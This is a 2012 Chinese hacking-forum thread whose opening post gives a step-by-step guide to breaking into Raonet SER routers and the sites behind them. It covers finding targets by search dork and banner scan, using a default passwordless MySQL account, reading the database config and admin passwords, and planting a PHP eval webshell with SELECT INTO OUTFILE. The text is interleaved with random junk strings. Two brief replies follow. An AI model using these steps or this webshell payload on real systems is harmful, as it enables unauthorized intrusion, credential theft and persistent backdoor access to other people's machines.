找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2801|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:
4 {% K5 J# [; \; K9 I  o& u9 X/ q3 b. ?  t. [6 K' N* k
1:google搜索'Raonet Subscriber Ethernet Router'
" s+ S1 m4 r* ~8 B* s7 H* `" U, ^; \3 [
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001+ D& S% j! K8 q  X" }% X, }# u

$ ^" Q6 K  }) U1 b3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
. \4 d) y- r0 Q  e5 J2 ~! i; b' a& x$ x! v. C
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
8 I" a0 F, y/ h9 x, c% ^; K" {2 G& h8 U

! i4 z8 T& q  I& J5 z) }: A
. E. y1 b2 k4 b, M; s: \- M0 g入侵步骤:3 h# i; v2 m& Z1 _+ f
, A6 ^9 F8 ~9 h# g8 a# k
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
6 q! X5 s4 U& s, n, w
+ @, G0 s+ v7 H& v4 _$ P" {+ I. \2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
% M8 l/ _  _! V! F: f6 ?% l6 M3:得到密码后连接,查看GUI管理密码:$ ~6 L2 t  @, F, G0 T4 k
use ser_500" @0 s" l5 C7 E5 \( M9 o  Q6 X2 X. w
select id,passwd from user;6 \# ?2 E) q3 |/ s+ s
4:通过数据库写入webshell,执行命令:
2 J' @) o- d( Suse mysql;
7 R: m! m3 t+ m; u2 @) xcreate table ok(cmd TEXT);
% T' v; c5 f- minsert into ok values("<?php @eval($_POST[cmd])?>");
5 u- ]4 @) U* V. M+ J+ }select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
6 v; C/ ~9 ^. p( \' Ddrop table ok;
1 c& u$ ~7 o; L) I; W" g7 v$ e2 s7 K$ x  R. K# L& t' D
5:连接后门shell.php
8 X, v5 ?3 V/ P! Y/ N3 Z# V) D2 P8 b& E- z' P) H
6. 搞定!/ K! @  @# D; `' v
- L0 x; U  _6 N9 C$ ?. n
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表